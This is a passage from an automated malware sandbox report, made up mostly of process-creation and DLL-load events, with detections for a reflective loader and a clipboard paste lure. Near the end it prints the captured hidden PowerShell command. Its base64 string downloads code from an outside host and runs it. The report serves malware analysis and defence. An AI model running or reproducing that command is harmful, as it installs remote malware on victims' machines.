              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe"
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Windows\System32\AtBroker.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: slc.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: pcacli.dll
              Source: C:\Windows\System32\AtBroker.exeSection loaded: sfc_os.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: uiautomationcore.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: oleacc.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: dui70.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: srh.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: duser.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: audioses.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: mmdevapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.media.speech.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: winmmbase.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: threadpoolwinrt.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: winmm.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: msacm32.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: msdmo.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: chakra.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: icuuc.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: icuin.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: icu.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: inputhost.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: magnification.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: wtsapi32.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: d3d9.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: dwmapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: uiamanager.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: twinapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: atlthunk.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.media.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: textshaping.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: actxprxy.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: avrt.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.ui.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: twinui.appcore.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: daxexec.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: fltlib.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: container.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Windows\System32\Narrator.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: wincorlib.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.xaml.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: coremessaging.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: iertutil.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: dcomp.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: wintypes.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windowmanagementapi.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: textinputframework.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: inputhost.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: propsys.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: urlmon.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: srvcli.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: netutils.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: dxgi.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: mrmcorer.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: d3d11.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: dxcore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: d2d1.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: profapi.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: dwrite.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: languageoverlayutil.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: textshaping.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: rmclient.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: uiamanager.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.core.textinput.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: dataexchange.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.ui.xaml.controls.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: msxml6.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: directmanipulation.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: windows.graphics.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: uiautomationcore.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: oleacc.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: mswb7.dll
              Source: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exeSection loaded: icu.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: dxgi.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: dxgi.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AtBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

              Data Obfuscation

              barindex
              Yara detected ReflectiveLoader
              Source: Yara matchFile source: 00000014.00000002.2278146446.000001F58C8DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2277861314.000001F58BFD0000.00000004.08000000.00040000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2278146446.000001F58DBEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Suspicious powershell command line found
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'

              Persistence and Installation Behavior

              barindex
              Detect drive by download via clipboard copy & paste
